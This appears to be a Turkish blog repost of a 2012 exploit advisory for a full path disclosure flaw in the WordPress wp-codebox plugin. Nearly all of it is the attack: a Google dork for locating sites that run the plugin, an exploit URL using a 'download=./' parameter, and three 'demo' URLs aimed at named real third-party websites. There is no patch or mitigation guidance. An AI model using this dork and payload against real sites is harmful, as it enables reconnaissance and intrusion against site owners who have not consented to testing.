WordPress wp-codebox Plugin Full Path Disclosure vulnerability

WordPress wp-codebox Plugin Full Path Disclosure açığı bulundu. Açığın oluşum yeri ve açık hakkındaki açıklamalar aşağıdaki şekilde;

#------------------------------------------------------------------------------------------------------------------
# Exploit Title: WordPress wp-codebox plugin Full Path Disclosure vulnerability
# Date: 14/01/2012
#  Author: terrorist
# Tested on: Fedora17 && Windows7
# Site: Hackforums.Ge
# Google dork: inurl:"wp-content/plugins/wp-codebox"
#------------------------------------------------------------------------------------------------------------------
 
# Exploit:
http://localhost/wp-content/plugins/wp-codebox/wp-codebox.php?p=1&download=./
 
# Demos:
http://www.secsavvy.com/wp-content/plugins/wp-codebox/wp-codebox.php?p=68&download=./
http://blog.cakephp-brasil.org/wp-content/plugins/wp-codebox/wp-codebox.php?p=68&download=./
http://www.amiel-donat.com/wp-content/plugins/wp-codebox/wp-codebox.php?p=68&download=./

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir